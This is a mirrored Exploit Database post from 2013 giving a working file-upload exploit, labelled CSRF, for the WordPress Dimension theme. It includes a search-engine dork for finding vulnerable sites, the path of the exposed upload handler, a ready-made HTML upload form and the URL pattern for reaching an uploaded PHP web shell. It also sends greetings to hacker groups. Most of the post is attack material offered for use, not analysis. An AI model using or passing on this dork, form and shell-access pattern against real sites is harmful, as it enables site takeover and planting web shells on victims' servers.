WordPress Theme Dimension – Cross-Site Request Forgery

• Exploit Database
• 14 阅读

• 作者： DevilScreaM
  日期： 2013-11-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/29668/

• #Title : WordPress Dimension Themes CSRF File Upload Vulnerability
  
  #Author : DevilScreaM
  
  #Date : 11/17/2013 - 17 November 2013
  
  #Category : Web Applications
  
  #Type : PHP
  
  #Vendor : http://themeforest.net
  
  #Download : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/
  
  #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
   Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
  
  #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
  
  #Tested : Mozila, Chrome, Opera -> Windows & Linux
  
  #Vulnerabillity : CSRF
  
  #Dork : 
  
  inurl:wp-content/themes/dimension
  
  
  CSRF File Upload Vulnerability
  
  Exploit & POC : 
  
  http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
  
  Script :
  
  <form enctype="multipart/form-data"
  action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post"> 
  Your File: <input name="uploadfile" type="file" /><br /> 
  <input type="submit" value="upload" /> 
  </form> 
  
  
  File Access :
  
  http://site-target/uploads/[years]/[month]/your_shell.php
  
  Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php